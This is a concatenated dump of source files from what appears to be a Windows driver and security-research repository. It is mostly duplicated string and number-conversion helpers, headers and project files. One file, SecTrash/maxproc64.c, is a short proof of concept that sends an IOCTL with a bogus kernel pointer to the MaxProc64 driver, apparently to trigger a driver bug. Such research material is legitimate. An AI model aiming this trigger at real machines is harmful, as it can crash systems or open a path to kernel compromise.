4 | {
5 | char *p;
6 |
7 | if ( (dest==0) || (src==0) )
8 | return dest;
9 |
10 | if (dest == src)
11 | return dest;
12 |
13 | p = dest;
14 | while ( *src!=0 ) {
15 | *p = *src;
16 | p++;
17 | src++;
18 | }
19 |
20 | *p = 0;
21 | return dest;
22 | }
23 |
24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
25 | {
26 | wchar_t *p;
27 |
28 | if ((dest == 0) || (src == 0))
29 | return dest;
30 |
31 | if (dest == src)
32 | return dest;
33 |
34 | p = dest;
35 | while ( *src!=0 ) {
36 | *p = *src;
37 | p++;
38 | src++;
39 | }
40 |
41 | *p = 0;
42 | return dest;
43 | }
44 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/ultohex.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t ultohex_a(unsigned long x, char *s)
4 | {
5 | char p;
6 | size_t c;
7 |
8 | if (s==0)
9 | return 8;
10 |
11 | for (c=0; c<8; c++) {
12 | p = (char)(x & 0xf);
13 | x >>= 4;
14 |
15 | if (p<10)
16 | p += '0';
17 | else
18 | p = 'A' + (p-10);
19 |
20 | s[7-c] = p;
21 | }
22 |
23 | s[8] = 0;
24 | return 8;
25 | }
26 |
27 | size_t ultohex_w(unsigned long x, wchar_t *s)
28 | {
29 | wchar_t p;
30 | size_t c;
31 |
32 | if (s==0)
33 | return 8;
34 |
35 | for (c=0; c<8; c++) {
36 | p = (wchar_t)(x & 0xf);
37 | x >>= 4;
38 |
39 | if (p<10)
40 | p += L'0';
41 | else
42 | p = L'A' + (p-10);
43 |
44 | s[7-c] = p;
45 | }
46 |
47 | s[8] = 0;
48 | return 8;
49 | }
50 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/ultostr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t ultostr_a(unsigned long x, char *s)
4 | {
5 | unsigned long t=x;
6 | size_t i, r=1;
7 |
8 | while ( t >= 10 ) {
9 | t /= 10;
10 | r++;
11 | }
12 |
13 | if (s == 0)
14 | return r;
15 |
16 | for (i = r; i != 0; i--) {
17 | s[i-1] = (char)(x % 10) + '0';
18 | x /= 10;
19 | }
20 |
21 | s[r] = (char)0;
22 | return r;
23 | }
24 |
25 | size_t ultostr_w(unsigned long x, wchar_t *s)
26 | {
27 | unsigned long t=x;
28 | size_t i, r=1;
29 |
30 | while ( t >= 10 ) {
31 | t /= 10;
32 | r++;
33 | }
34 |
35 | if (s == 0)
36 | return r;
37 |
38 | for (i = r; i != 0; i--) {
39 | s[i-1] = (wchar_t)(x % 10) + L'0';
40 | x /= 10;
41 | }
42 |
43 | s[r] = (wchar_t)0;
44 | return r;
45 | }
46 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/ultostr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t ultostr_a(unsigned long x, char *s)
4 | {
5 | unsigned long t=x;
6 | size_t i, r=1;
7 |
8 | while ( t >= 10 ) {
9 | t /= 10;
10 | r++;
11 | }
12 |
13 | if (s == 0)
14 | return r;
15 |
16 | for (i = r; i != 0; i--) {
17 | s[i-1] = (char)(x % 10) + '0';
18 | x /= 10;
19 | }
20 |
21 | s[r] = (char)0;
22 | return r;
23 | }
24 |
25 | size_t ultostr_w(unsigned long x, wchar_t *s)
26 | {
27 | unsigned long t=x;
28 | size_t i, r=1;
29 |
30 | while ( t >= 10 ) {
31 | t /= 10;
32 | r++;
33 | }
34 |
35 | if (s == 0)
36 | return r;
37 |
38 | for (i = r; i != 0; i--) {
39 | s[i-1] = (wchar_t)(x % 10) + L'0';
40 | x /= 10;
41 | }
42 |
43 | s[r] = (wchar_t)0;
44 | return r;
45 | }
46 |
--------------------------------------------------------------------------------
/source/SecTrash/maxproc64.c:
--------------------------------------------------------------------------------
1 | int main()
2 | {
3 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\MaxProc64"),
4 | GENERIC_READ | GENERIC_WRITE,
5 | 0,
6 | NULL,
7 | OPEN_EXISTING,
8 | 0,
9 | NULL);
10 |
11 | if (deviceHandle == INVALID_HANDLE_VALUE) {
12 | printf_s("[!] Unable to open device\r\n");
13 | return -1;
14 | }
15 | else {
16 | printf_s("[+] MaxProc64 device opened\r\n");
17 | }
18 |
19 | NTSTATUS ntStatus;
20 |
21 | ntStatus = CallDriver(deviceHandle,
22 | 0x220019,
23 | (PVOID)0xFFFFFFFF12345678,
24 | 0,
25 | NULL,
26 | 0);
27 |
28 | printf_s("[+] CallDriver NTSTATUS 0x%lX\r\n", ntStatus);
29 |
30 |
31 | CloseHandle(deviceHandle);
32 | }
33 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strcmp.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | int _strcmp_a(const char *s1, const char *s2)
4 | {
5 | char c1, c2;
6 |
7 | if ( s1==s2 )
8 | return 0;
9 |
10 | if ( s1==0 )
11 | return -1;
12 |
13 | if ( s2==0 )
14 | return 1;
15 |
16 | do {
17 | c1 = *s1;
18 | c2 = *s2;
19 | s1++;
20 | s2++;
21 | } while ( (c1 != 0) && (c1 == c2) );
22 |
23 | return (int)(c1 - c2);
24 | }
25 |
26 | int _strcmp_w(const wchar_t *s1, const wchar_t *s2)
27 | {
28 | wchar_t c1, c2;
29 |
30 | if ( s1==s2 )
31 | return 0;
32 |
33 | if ( s1==0 )
34 | return -1;
35 |
36 | if ( s2==0 )
37 | return 1;
38 |
39 | do {
40 | c1 = *s1;
41 | c2 = *s2;
42 | s1++;
43 | s2++;
44 | } while ( (c1 != 0) && (c1 == c2) );
45 |
46 | return (int)(c1 - c2);
47 | }
48 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/ultohex.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t ultohex_a(unsigned long x, char *s)
4 | {
5 | char p;
6 | size_t c;
7 |
8 | if (s==0)
9 | return 8;
10 |
11 | for (c=0; c<8; c++) {
12 | p = (char)(x & 0xf);
13 | x >>= 4;
14 |
15 | if (p<10)
16 | p += '0';
17 | else
18 | p = 'A' + (p-10);
19 |
20 | s[7-c] = p;
21 | }
22 |
23 | s[8] = 0;
24 | return 8;
25 | }
26 |
27 | size_t ultohex_w(unsigned long x, wchar_t *s)
28 | {
29 | wchar_t p;
30 | size_t c;
31 |
32 | if (s==0)
33 | return 8;
34 |
35 | for (c=0; c<8; c++) {
36 | p = (wchar_t)(x & 0xf);
37 | x >>= 4;
38 |
39 | if (p<10)
40 | p += L'0';
41 | else
42 | p = L'A' + (p-10);
43 |
44 | s[7-c] = p;
45 | }
46 |
47 | s[8] = 0;
48 | return 8;
49 | }
50 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/u64tohex.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t u64tohex_a(unsigned long long x, char *s)
4 | {
5 | char p;
6 | size_t c;
7 |
8 | if (s==0)
9 | return 16;
10 |
11 | for (c=0; c<16; c++) {
12 | p = (char)(x & 0xf);
13 | x >>= 4;
14 |
15 | if (p<10)
16 | p += '0';
17 | else
18 | p = 'A' + (p-10);
19 |
20 | s[15-c] = p;
21 | }
22 |
23 | s[16] = 0;
24 | return 16;
25 | }
26 |
27 | size_t u64tohex_w(unsigned long long x, wchar_t *s)
28 | {
29 | wchar_t p;
30 | size_t c;
31 |
32 | if (s==0)
33 | return 16;
34 |
35 | for (c = 0; c<16; c++) {
36 | p = (wchar_t)(x & 0xf);
37 | x >>= 4;
38 |
39 | if (p<10)
40 | p += L'0';
41 | else
42 | p = L'A' + (p-10);
43 |
44 | s[15-c] = p;
45 | }
46 |
47 | s[16] = 0;
48 | return 16;
49 | }
50 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/u64tostr.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t u64tostr_a(unsigned long long x, char *s)
4 | {
5 | unsigned long long t = x;
6 | size_t i, r=1;
7 |
8 | while ( t >= 10 ) {
9 | t /= 10;
10 | r++;
11 | }
12 |
13 | if (s == 0)
14 | return r;
15 |
16 | for (i = r; i != 0; i--) {
17 | s[i-1] = (char)(x % 10) + '0';
18 | x /= 10;
19 | }
20 |
21 | s[r] = (char)0;
22 | return r;
23 | }
24 |
25 | size_t u64tostr_w(unsigned long long x, wchar_t *s)
26 | {
27 | unsigned long long t = x;
28 | size_t i, r=1;
29 |
30 | while ( t >= 10 ) {
31 | t /= 10;
32 | r++;
33 | }
34 |
35 | if (s == 0)
36 | return r;
37 |
38 | for (i = r; i != 0; i--) {
39 | s[i-1] = (wchar_t)(x % 10) + L'0';
40 | x /= 10;
41 | }
42 |
43 | s[r] = (wchar_t)0;
44 | return r;
45 | }
46 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.idl:
--------------------------------------------------------------------------------
1 | // AmsiScan.idl : IDL source for AmsiScan
2 | //
3 |
4 | // This file will be processed by the MIDL tool to
5 | // produce the type library (AmsiScan.tlb) and marshalling code.
6 |
7 | import "oaidl.idl";
8 | import "ocidl.idl";
9 |
10 | [
11 | object,
12 | uuid(05025dfe-70d5-4b61-a55a-aa21585d4cb2),
13 | dual,
14 | nonextensible,
15 | pointer_default(unique)
16 | ]
17 | interface IAmsiProvider : IDispatch
18 | {
19 | };
20 | [
21 | uuid(508c88ef-ca97-4107-a022-6025892ef192),
22 | version(1.0),
23 | ]
24 | library AmsiScanLib
25 | {
26 | importlib("stdole2.tlb");
27 | [
28 | uuid(1c0643e1-5b0a-4420-9b76-0de9264b4c59)
29 | ]
30 | coclass AmsiProvider
31 | {
32 | [default] interface IAmsiProvider;
33 | };
34 | };
35 |
36 | import "shobjidl.idl";
37 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/u64tohex.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t u64tohex_a(unsigned long long x, char *s)
4 | {
5 | char p;
6 | size_t c;
7 |
8 | if (s==0)
9 | return 16;
10 |
11 | for (c=0; c<16; c++) {
12 | p = (char)(x & 0xf);
13 | x >>= 4;
14 |
15 | if (p<10)
16 | p += '0';
17 | else
18 | p = 'A' + (p-10);
19 |
20 | s[15-c] = p;
21 | }
22 |
23 | s[16] = 0;
24 | return 16;
25 | }
26 |
27 | size_t u64tohex_w(unsigned long long x, wchar_t *s)
28 | {
29 | wchar_t p;
30 | size_t c;
31 |
32 | if (s==0)
33 | return 16;
34 |
35 | for (c = 0; c<16; c++) {
36 | p = (wchar_t)(x & 0xf);
37 | x >>= 4;
38 |
39 | if (p<10)
40 | p += L'0';
41 | else
42 | p = L'A' + (p-10);
43 |
44 | s[15-c] = p;
45 | }
46 |
47 | s[16] = 0;
48 | return 16;
49 | }
50 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | int _strcmpi_a(const char *s1, const char *s2)
4 | {
5 | char c1, c2;
6 |
7 | if ( s1==s2 )
8 | return 0;
9 |
10 | if ( s1==0 )
11 | return -1;
12 |
13 | if ( s2==0 )
14 | return 1;
15 |
16 | do {
17 | c1 = locase_a(*s1);
18 | c2 = locase_a(*s2);
19 | s1++;
20 | s2++;
21 | } while ( (c1 != 0) && (c1 == c2) );
22 |
23 | return (int)(c1 - c2);
24 | }
25 |
26 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
27 | {
28 | wchar_t c1, c2;
29 |
30 | if ( s1==s2 )
31 | return 0;
32 |
33 | if ( s1==0 )
34 | return -1;
35 |
36 | if ( s2==0 )
37 | return 1;
38 |
39 | do {
40 | c1 = locase_w(*s1);
41 | c2 = locase_w(*s2);
42 | s1++;
43 | s2++;
44 | } while ( (c1 != 0) && (c1 == c2) );
45 |
46 | return (int)(c1 - c2);
47 | }
48 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strcmpi.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | int _strcmpi_a(const char *s1, const char *s2)
4 | {
5 | char c1, c2;
6 |
7 | if ( s1==s2 )
8 | return 0;
9 |
10 | if ( s1==0 )
11 | return -1;
12 |
13 | if ( s2==0 )
14 | return 1;
15 |
16 | do {
17 | c1 = locase_a(*s1);
18 | c2 = locase_a(*s2);
19 | s1++;
20 | s2++;
21 | } while ( (c1 != 0) && (c1 == c2) );
22 |
23 | return (int)(c1 - c2);
24 | }
25 |
26 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
27 | {
28 | wchar_t c1, c2;
29 |
30 | if ( s1==s2 )
31 | return 0;
32 |
33 | if ( s1==0 )
34 | return -1;
35 |
36 | if ( s2==0 )
37 | return 1;
38 |
39 | do {
40 | c1 = locase_w(*s1);
41 | c2 = locase_w(*s2);
42 | s1++;
43 | s2++;
44 | } while ( (c1 != 0) && (c1 == c2) );
45 |
46 | return (int)(c1 - c2);
47 | }
48 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/stdafx.h:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007-2008 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #pragma once
11 |
12 | #ifndef WINVER
13 | #define WINVER 0x0400
14 | #endif
15 |
16 | #ifndef _WIN32_WINNT
17 | #define _WIN32_WINNT 0x0400
18 | #endif
19 |
20 | #ifndef _WIN32_WINDOWS
21 | #define _WIN32_WINDOWS 0x0410
22 | #endif
23 |
24 | #ifndef _WIN32_IE
25 | #define _WIN32_IE 0x0600
26 | #endif
27 |
28 | #define WIN32_LEAN_AND_MEAN
29 | #include
30 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strncpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
4 | {
5 | char *p;
6 |
7 | if ( (dest==0) || (src==0) || (ccdest==0) )
8 | return dest;
9 |
10 | ccdest--;
11 | p = dest;
12 |
13 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
14 | *p = *src;
15 | p++;
16 | src++;
17 | ccdest--;
18 | ccsrc--;
19 | }
20 |
21 | *p = 0;
22 | return dest;
23 | }
24 |
25 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
26 | {
27 | wchar_t *p;
28 |
29 | if ( (dest==0) || (src==0) || (ccdest==0) )
30 | return dest;
31 |
32 | ccdest--;
33 | p = dest;
34 |
35 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
36 | *p = *src;
37 | p++;
38 | src++;
39 | ccdest--;
40 | ccsrc--;
41 | }
42 |
43 | *p = 0;
44 | return dest;
45 | }
46 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strncpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
4 | {
5 | char *p;
6 |
7 | if ( (dest==0) || (src==0) || (ccdest==0) )
8 | return dest;
9 |
10 | ccdest--;
11 | p = dest;
12 |
13 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
14 | *p = *src;
15 | p++;
16 | src++;
17 | ccdest--;
18 | ccsrc--;
19 | }
20 |
21 | *p = 0;
22 | return dest;
23 | }
24 |
25 | wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
26 | {
27 | wchar_t *p;
28 |
29 | if ( (dest==0) || (src==0) || (ccdest==0) )
30 | return dest;
31 |
32 | ccdest--;
33 | p = dest;
34 |
35 | while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
36 | *p = *src;
37 | p++;
38 | src++;
39 | ccdest--;
40 | ccsrc--;
41 | }
42 |
43 | *p = 0;
44 | return dest;
45 | }
46 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/cmdline.h:
--------------------------------------------------------------------------------
1 | #ifndef _CMDLINEH_
2 | #define _CMDLINEH_
3 |
4 | BOOL GetCommandLineParamW(
5 | IN LPCWSTR CmdLine,
6 | IN ULONG ParamIndex,
7 | OUT LPWSTR Buffer,
8 | IN ULONG BufferSize,
9 | OUT PULONG ParamLen
10 | );
11 |
12 | BOOL GetCommandLineParamA(
13 | IN LPCSTR CmdLine,
14 | IN ULONG ParamIndex,
15 | OUT LPSTR Buffer,
16 | IN ULONG BufferSize,
17 | OUT PULONG ParamLen
18 | );
19 |
20 | char *ExtractFilePathA(const char *FileName, char *FilePath);
21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
22 |
23 | #ifdef UNICODE
24 |
25 | #define ExtractFilePath ExtractFilePathW
26 | #define GetCommandLineParam GetCommandLineParamW
27 |
28 | #else // ANSI
29 |
30 | #define ExtractFilePath ExtractFilePathA
31 | #define GetCommandLineParam GetCommandLineParamA
32 |
33 | #endif
34 |
35 | #endif /* _CMDLINEH_ */
36 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/cmdline.h:
--------------------------------------------------------------------------------
1 | #ifndef _CMDLINEH_
2 | #define _CMDLINEH_
3 |
4 | BOOL GetCommandLineParamW(
5 | IN LPCWSTR CmdLine,
6 | IN ULONG ParamIndex,
7 | OUT LPWSTR Buffer,
8 | IN ULONG BufferSize,
9 | OUT PULONG ParamLen
10 | );
11 |
12 | BOOL GetCommandLineParamA(
13 | IN LPCSTR CmdLine,
14 | IN ULONG ParamIndex,
15 | OUT LPSTR Buffer,
16 | IN ULONG BufferSize,
17 | OUT PULONG ParamLen
18 | );
19 |
20 | char *ExtractFilePathA(const char *FileName, char *FilePath);
21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
22 |
23 | #ifdef UNICODE
24 |
25 | #define ExtractFilePath ExtractFilePathW
26 | #define GetCommandLineParam GetCommandLineParamW
27 |
28 | #else // ANSI
29 |
30 | #define ExtractFilePath ExtractFilePathA
31 | #define GetCommandLineParam GetCommandLineParamA
32 |
33 | #endif
34 |
35 | #endif /* _CMDLINEH_ */
36 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/cmdline.h:
--------------------------------------------------------------------------------
1 | #ifndef _CMDLINEH_
2 | #define _CMDLINEH_
3 |
4 | BOOL GetCommandLineParamW(
5 | IN LPCWSTR CmdLine,
6 | IN ULONG ParamIndex,
7 | OUT LPWSTR Buffer,
8 | IN ULONG BufferSize,
9 | OUT PULONG ParamLen
10 | );
11 |
12 | BOOL GetCommandLineParamA(
13 | IN LPCSTR CmdLine,
14 | IN ULONG ParamIndex,
15 | OUT LPSTR Buffer,
16 | IN ULONG BufferSize,
17 | OUT PULONG ParamLen
18 | );
19 |
20 | char *ExtractFilePathA(const char *FileName, char *FilePath);
21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
22 |
23 | #ifdef UNICODE
24 |
25 | #define ExtractFilePath ExtractFilePathW
26 | #define GetCommandLineParam GetCommandLineParamW
27 |
28 | #else // ANSI
29 |
30 | #define ExtractFilePath ExtractFilePathA
31 | #define GetCommandLineParam GetCommandLineParamA
32 |
33 | #endif
34 |
35 | #endif /* _CMDLINEH_ */
36 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/Port32.h:
--------------------------------------------------------------------------------
1 | #ifndef PORT32_H
2 | #define PORT32_H
3 |
4 | #pragma pack(1)
5 |
6 | struct GDT_DESCRIPTOR
7 | {
8 | WORD Limit_0_15;
9 | WORD Base_0_15;
10 | BYTE Base_16_23;
11 | BYTE Type : 4;
12 | BYTE System : 1;
13 | BYTE DPL : 2;
14 | BYTE Present : 1;
15 | BYTE Limit_16_19 : 4;
16 | BYTE Available : 1;
17 | BYTE Reserved : 1;
18 | BYTE D_B : 1;
19 | BYTE Granularity : 1;
20 | BYTE Base_24_31;
21 | };
22 |
23 | struct CALLGATE_DESCRIPTOR
24 | {
25 | WORD Offset_0_15;
26 | WORD Selector;
27 | WORD ParamCount : 5;
28 | WORD Unused : 3;
29 | WORD Type : 4;
30 | WORD System : 1;
31 | WORD DPL : 2;
32 | WORD Present : 1;
33 | WORD Offset_16_31;
34 | };
35 |
36 | struct GDTR
37 | {
38 | WORD wGDTLimit;
39 | DWORD dwGDTBase;
40 | };
41 |
42 | #pragma pack()
43 |
44 | #endif
--------------------------------------------------------------------------------
/source/wdextract/wdextract/wdextract.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\wdbase\mpasbase.dll
5 | WindowsLocalDebugger
6 |
7 |
8 | c:\wdbase\mpavbase.vdm
9 | WindowsLocalDebugger
10 |
11 |
12 | C:\wdbase\mpasbase.dll
13 | WindowsLocalDebugger
14 |
15 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strncmp.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | int _strncmp_a(const char *s1, const char *s2, size_t cchars)
4 | {
5 | char c1, c2;
6 |
7 | if ( s1==s2 )
8 | return 0;
9 |
10 | if ( s1==0 )
11 | return -1;
12 |
13 | if ( s2==0 )
14 | return 1;
15 |
16 | if ( cchars==0 )
17 | return 0;
18 |
19 | do {
20 | c1 = *s1;
21 | c2 = *s2;
22 | s1++;
23 | s2++;
24 | cchars--;
25 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
26 |
27 | return (int)(c1 - c2);
28 | }
29 |
30 | int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
31 | {
32 | wchar_t c1, c2;
33 |
34 | if ( s1==s2 )
35 | return 0;
36 |
37 | if ( s1==0 )
38 | return -1;
39 |
40 | if ( s2==0 )
41 | return 1;
42 |
43 | if ( cchars==0 )
44 | return 0;
45 |
46 | do {
47 | c1 = *s1;
48 | c2 = *s2;
49 | s1++;
50 | s2++;
51 | cchars--;
52 | } while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
53 |
54 | return (int)(c1 - c2);
55 | }
56 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/HWInterfaceDrv.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 9.00
3 | # Visual Studio 2005
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HWInterfaceDrv", "HWInterfaceDrv.vcproj", "{95B297EE-9E8E-464B-B626-A69C9ED13158}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Debug|Win32.Build.0 = Debug|Win32
14 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Release|Win32.ActiveCfg = Release|Win32
15 | {95B297EE-9E8E-464B-B626-A69C9ED13158}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
15 | __forceinline char locase_a(char c)
16 | {
17 | if ((c >= 'A') && (c <= 'Z'))
18 | return c + 0x20;
19 | else
20 | return c;
21 | }
22 |
23 | __forceinline wchar_t locase_w(wchar_t c)
24 | {
25 | if ((c >= 'A') && (c <= 'Z'))
26 | return c + 0x20;
27 | else
28 | return c;
29 | }
30 |
31 | __forceinline char byteabs(char x) {
32 | if (x < 0)
33 | return -x;
34 | return x;
35 | }
36 |
37 | __forceinline int _isdigit_a(char x) {
38 | return ((x >= '0') && (x <= '9'));
39 | }
40 |
41 | __forceinline int _isdigit_w(wchar_t x) {
42 | return ((x >= L'0') && (x <= L'9'));
43 | }
44 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
15 | __forceinline char locase_a(char c)
16 | {
17 | if ((c >= 'A') && (c <= 'Z'))
18 | return c + 0x20;
19 | else
20 | return c;
21 | }
22 |
23 | __forceinline wchar_t locase_w(wchar_t c)
24 | {
25 | if ((c >= 'A') && (c <= 'Z'))
26 | return c + 0x20;
27 | else
28 | return c;
29 | }
30 |
31 | __forceinline char byteabs(char x) {
32 | if (x < 0)
33 | return -x;
34 | return x;
35 | }
36 |
37 | __forceinline int _isdigit_a(char x) {
38 | return ((x >= '0') && (x <= '9'));
39 | }
40 |
41 | __forceinline int _isdigit_w(wchar_t x) {
42 | return ((x >= L'0') && (x <= L'9'));
43 | }
44 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
15 | __forceinline char locase_a(char c)
16 | {
17 | if ((c >= 'A') && (c <= 'Z'))
18 | return c + 0x20;
19 | else
20 | return c;
21 | }
22 |
23 | __forceinline wchar_t locase_w(wchar_t c)
24 | {
25 | if ((c >= 'A') && (c <= 'Z'))
26 | return c + 0x20;
27 | else
28 | return c;
29 | }
30 |
31 | __forceinline char byteabs(char x) {
32 | if (x < 0)
33 | return -x;
34 | return x;
35 | }
36 |
37 | __forceinline int _isdigit_a(char x) {
38 | return ((x >= '0') && (x <= '9'));
39 | }
40 |
41 | __forceinline int _isdigit_w(wchar_t x) {
42 | return ((x >= L'0') && (x <= L'9'));
43 | }
44 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/rtltypes.h:
--------------------------------------------------------------------------------
1 | #ifndef _WCHAR_T_DEFINED
2 | typedef unsigned short wchar_t;
3 | #define _WCHAR_T_DEFINED
4 | #endif /* _WCHAR_T_DEFINED */
5 |
6 | #ifndef _SIZE_T_DEFINED
7 | #ifdef _WIN64
8 | typedef unsigned __int64 size_t;
9 | #else /* _WIN64 */
10 | typedef __w64 unsigned int size_t;
11 | #endif /* _WIN64 */
12 | #define _SIZE_T_DEFINED
13 | #endif /* _SIZE_T_DEFINED */
14 |
15 | __forceinline char locase_a(char c)
16 | {
17 | if ((c >= 'A') && (c <= 'Z'))
18 | return c + 0x20;
19 | else
20 | return c;
21 | }
22 |
23 | __forceinline wchar_t locase_w(wchar_t c)
24 | {
25 | if ((c >= 'A') && (c <= 'Z'))
26 | return c + 0x20;
27 | else
28 | return c;
29 | }
30 |
31 | __forceinline char byteabs(char x) {
32 | if (x < 0)
33 | return -x;
34 | return x;
35 | }
36 |
37 | __forceinline int _isdigit_a(char x) {
38 | return ((x >= '0') && (x <= '9'));
39 | }
40 |
41 | __forceinline int _isdigit_w(wchar_t x) {
42 | return ((x >= L'0') && (x <= L'9'));
43 | }
44 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dlldata.c:
--------------------------------------------------------------------------------
1 | /*********************************************************
2 | DllData file -- generated by MIDL compiler
3 |
4 | DO NOT ALTER THIS FILE
5 |
6 | This file is regenerated by MIDL on every IDL file compile.
7 |
8 | To completely reconstruct this file, delete it and rerun MIDL
9 | on all the IDL files in this DLL, specifying this file for the
10 | /dlldata command line option
11 |
12 | *********************************************************/
13 |
14 | #define PROXY_DELEGATION
15 |
16 | #include
17 |
18 | #ifdef __cplusplus
19 | extern "C" {
20 | #endif
21 |
22 | EXTERN_PROXY_FILE( AmsiScan )
23 |
24 |
25 | PROXYFILE_LIST_START
26 | /* Start of list */
27 | REFERENCE_PROXY_FILE( AmsiScan ),
28 | /* End of list */
29 | PROXYFILE_LIST_END
30 |
31 |
